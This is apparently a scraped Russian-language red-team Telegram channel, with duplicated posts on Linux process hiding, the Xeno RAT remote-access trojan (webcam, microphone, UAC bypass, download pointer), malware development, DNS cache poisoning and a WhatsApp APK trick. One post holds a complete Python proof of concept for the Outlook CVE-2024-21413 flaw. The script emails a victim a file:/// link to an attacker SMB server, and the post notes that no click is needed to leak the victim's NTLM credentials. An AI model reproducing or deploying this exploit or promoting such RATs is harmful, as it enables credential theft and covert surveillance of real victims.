Плащ невидимка для linux процессов
*
В программе:
Аномальное монтирование
Пустые каталоги в которых есть жизнь
Заплывы с sTrace
Форензика одной ладошкой
*
Я надеваю свой плащ и волшебную шляпу - Invisibility Cloak - Slash-Proc Magic
#redteam #linux #proc
*
В программе:
Аномальное монтирование
Пустые каталоги в которых есть жизнь
Заплывы с sTrace
Форензика одной ладошкой
*
Я надеваю свой плащ и волшебную шляпу - Invisibility Cloak - Slash-Proc Magic
#redteam #linux #proc
🔥13👍6
Xeno Rat
*
Опенсорсный РАТник, написан на
*
Крыса умеет:
HVNC
Live Microphoneand camera
Socks5 Reverse Proxy
Regular Updates and Much More (ну тут сомнительно)
Built Completely from Scratch (скорее минус чем плюс)
UAC bypass (хммм)
Fun menu (праздник для души и мёд для ушей)
ну и куча всего
download крысу
#RAT #funny
*
Опенсорсный РАТник, написан на
C# и совместим с Windows 10, 11*
Крыса умеет:
HVNC
Live Microphoneand camera
Socks5 Reverse Proxy
Regular Updates and Much More (ну тут сомнительно)
Built Completely from Scratch (скорее минус чем плюс)
UAC bypass (хммм)
Fun menu (праздник для души и мёд для ушей)
ну и куча всего
download крысу
#RAT #funny
🔥14👍8😱1
BreachForum Party !!!
В программе:
Канье Уэст и агенты FBI
BugBounty с паяльником
Ряженные cisco talos
И мерч в полоску
Вы приходите
😆
#breachforum
👍15🔥5😱1
Malware Development
*
Part I - Analysis and DFIR Series
Part II - Analysis and DFIR Series
Part III - Analysis and DFIR Series
Part IV - Analysis and DFIR Series
#malware
*
Part I - Analysis and DFIR Series
Part II - Analysis and DFIR Series
Part III - Analysis and DFIR Series
Part IV - Analysis and DFIR Series
#malware
👍9🔥6
2024-21413 /outlook RCE
*
POC
Но есть пара НО:
1. В строке 27 вам необходимо указать путь к файлу на вашем сервере (линк на
2. На линк жертве кликать не нужно,
3. Было мнение что нужно находиться в LAN жертвы, но как бы есть пара минут пока
#outглюк #ntlm2
*
POC
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
def send_email():
# Get user input for sender's email address and password
sender_email = input("Enter your Outlook email address: ")
sender_password = input("Enter your Outlook email password: ")
# Get user input for receiver's email address
receiver_email = input("Enter the recipient's email address: ")
# Create a new message object
msg = MIMEMultipart()
# Add sender, receiver, and subject to the message
msg['From'] = sender_email
msg['To'] = receiver_email
msg['Subject'] = input("Enter email subject: ")
# Ask user if they want to add a link attachment
add_attachment = input("Do you want to add a link attachment? (yes/no): ").lower()
if add_attachment == 'yes':
html_content = """\
<!DOCTYPE html>
<html lang="en">
<body>
<p><a href="file:///\\192.168.206.139/test/Doc.txt!xssvideo">Salary docs</a></p>
</body>
</html>"""
msg.attach(MIMEText(html_content, 'html'))
# Connect to SMTP server and send email
with smtplib.SMTP('smtp-mail.outlook.com', 587) as server:
server.starttls()
server.login(sender_email, sender_password)
server.send_message(msg)
print("Email sent successfully.")
if __name__ == "__main__":
send_email()
Но есть пара НО:
1. В строке 27 вам необходимо указать путь к файлу на вашем сервере (линк на
rtf например)2. На линк жертве кликать не нужно,
Office Protected View все сам сделает.3. Было мнение что нужно находиться в LAN жертвы, но как бы есть пара минут пока
port established#outглюк #ntlm2
🔥18👍10
TuDoor
*
Только не королевская династия, я скорее династия
В общем к сути, собралась как то в Окледе (богоспасаемые штаты) группа хитрых азиатов.
Слово за слово, все скатилось к перечитыванию
основной тезис которого как известно гласит, пойди и отрави DNS ближнего своего.
Ну и как водится дочитались до дыр в
*
Рекомендую к осмыслению саму страничку и линки внизу.
Среда чюваки
#DNS #DOS #cachepoison
*
Только не королевская династия, я скорее династия
DNS.В общем к сути, собралась как то в Окледе (богоспасаемые штаты) группа хитрых азиатов.
Слово за слово, все скатилось к перечитыванию
RFC и трудов Дэна Камински (мир праху его), основной тезис которого как известно гласит, пойди и отрави DNS ближнего своего.
Ну и как водится дочитались до дыр в
BIND, PowerDNS и Microsoft DNS и всего сопутствующего.*
Рекомендую к осмыслению саму страничку и линки внизу.
Среда чюваки
#DNS #DOS #cachepoison
👍17🔥3😱3
This media is not supported in your browser
VIEW IN TELEGRAM
WhatsApp extension manipulation
*
Что с телегой, что вацапом, это даже комментировать не хочется, когда юзер сам ставит APK и дает ему разрешения.
Когда там последний zeroClick был, 2 года назад ? )
*
POC
#FU
*
Что с телегой, что вацапом, это даже комментировать не хочется, когда юзер сам ставит APK и дает ему разрешения.
Когда там последний zeroClick был, 2 года назад ? )
*
POC
#FU
👍24🔥8😱5